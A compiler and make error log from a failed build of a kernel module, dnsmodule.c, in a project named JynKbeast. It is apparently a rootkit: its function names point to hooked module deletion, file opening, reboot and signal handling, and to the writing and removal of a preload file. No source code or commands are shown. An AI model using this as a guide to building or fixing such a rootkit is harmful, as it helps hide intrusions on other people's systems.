/mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:828: error: ‘kbuf’ undeclared (first use in this function) 21 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:828: error: (Each undeclared identifier is reported only once 22 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:828: error: for each function it appears in.) 23 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘delInit’: 24 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:879: warning: ISO C90 forbids mixed declarations and code 25 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:882: warning: ISO C90 forbids mixed declarations and code 26 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_delete_module’: 27 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:929: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 28 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘my_reboot’: 29 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:942: warning: no return statement in function returning non-void 30 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘my_signal’: 31 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:947: warning: no return statement in function returning non-void 32 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘writePreload’: 33 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:992: warning: ISO C90 forbids mixed declarations and code 34 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘delPreload’: 35 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1083: warning: format ‘%i’ expects type ‘int’, but argument 4 has type ‘loff_t’ 36 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1086: warning: ISO C90 forbids mixed declarations and code 37 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1091: warning: ISO C90 forbids mixed declarations and code 38 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_open’: 39 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1130: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 40 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘init’: 41 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1203: warning: ISO C90 forbids mixed declarations and code 42 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1210: warning: assignment makes integer from pointer without a cast 43 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1213: warning: assignment makes integer from pointer without a cast 44 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1218: warning: assignment makes pointer from integer without a cast 45 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1219: warning: assignment makes integer from pointer without a cast 46 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1223: warning: assignment makes pointer from integer without a cast 47 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1224: warning: assignment makes integer from pointer without a cast 48 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1225: warning: assignment makes pointer from integer without a cast 49 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1226: warning: assignment makes integer from pointer without a cast 50 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1227: warning: assignment makes pointer from integer without a cast 51 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1228: warning: assignment makes integer from pointer without a cast 52 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1229: warning: assignment makes pointer from integer without a cast 53 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1230: warning: assignment makes integer from pointer without a cast 54 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1231: warning: assignment makes pointer from integer without a cast 55 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1232: warning: assignment makes integer from pointer without a cast 56 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1233: warning: assignment makes pointer from integer without a cast 57 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1234: warning: assignment makes integer from pointer without a cast 58 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1235: warning: assignment makes pointer from integer without a cast 59 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1236: warning: assignment makes integer from pointer without a cast 60 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1238: warning: assignment makes pointer from integer without a cast 61 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1239: warning: assignment makes integer from pointer without a cast 62 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1253: warning: assignment makes pointer from integer without a cast 63 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1254: warning: assignment makes integer from pointer without a cast 64 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1255: warning: assignment makes pointer from integer without a cast 65 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1256: warning: assignment makes integer from pointer without a cast 66 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘exit’: 67 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1281: warning: assignment makes integer from pointer without a cast 68 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1283: warning: assignment makes integer from pointer without a cast 69 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1287: warning: assignment makes integer from pointer without a cast 70 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1291: warning: assignment makes integer from pointer without a cast 71 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1292: warning: assignment makes integer from pointer without a cast 72 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1293: warning: assignment makes integer from pointer without a cast 73 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1294: warning: assignment makes integer from pointer without a cast 74 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1295: warning: assignment makes integer from pointer without a cast 75 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1296: warning: assignment makes integer from pointer without a cast 76 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1297: warning: assignment makes integer from pointer without a cast 77 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1298: warning: assignment makes integer from pointer without a cast 78 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1303: warning: assignment makes integer from pointer without a cast 79 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1304: warning: assignment makes integer from pointer without a cast 80 | make[2]: *** [/mnt/hgfs/work_virtual/JynKbeast/dnsmodule.o] Error 1 81 | make[1]: *** [_module_/mnt/hgfs/work_virtual/JynKbeast] Error 2 82 | make: *** [all] Error 2 83 | --------------------------------------------------------------------------------